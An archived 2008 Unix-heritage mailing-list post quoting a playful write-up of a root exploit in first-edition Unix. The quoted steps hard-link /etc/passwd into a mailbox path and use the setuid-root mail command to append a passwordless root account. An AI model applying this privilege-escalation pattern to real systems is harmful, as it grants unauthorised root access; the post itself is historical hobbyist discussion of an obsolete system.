[Unix-jun72] [TUHS] Some fun with 1st ed
lm at bitmover.com
Sat May 3 15:24:00 EDT 2008
We need to send out a security alert immediately. This is serious.
On Sat, May 03, 2008 at 09:20:13AM -1000, Tim Newsham wrote:
> All work and no play...
> Here's a fun hack for first edition unix. From MAIL (I) :
> When followed by the names of a letter and one or more people, the
> letter is appended to each person's mailbox. Each letter is
> preceded by the sender's name and a postmark.
> A person is either the nameof an entry in the directory /usr, in
> which case the mail is sent to /usr/person/mailbox, or the path
> of a directory, in which case mailbox in that directory is used.
> Mail is setuid root:
> # ls -l /bin/mail
> 80 surwr- 1 root 3940 Jan 1 00:00:00 mail
> login as a non-root user (ie "bin"), create a file "letter" with the
> contents "hack::0:/:". Run:
> @ ln /etc/passwd /tmp/mailbox
> @ mail letter /tmp
> log out and log back in as "hack". You are now root. Cat /etc/passwd
> and notice:
> From bin Jan 1 00:49:22
> clean up the file a little and enjoy your new elevated status.
> Tim Newsham
> TUHS mailing list
> TUHS at minnie.tuhs.org
Larry McVoy lm at bitmover.com http://www.bitkeeper.com
More information about the Unix-jun72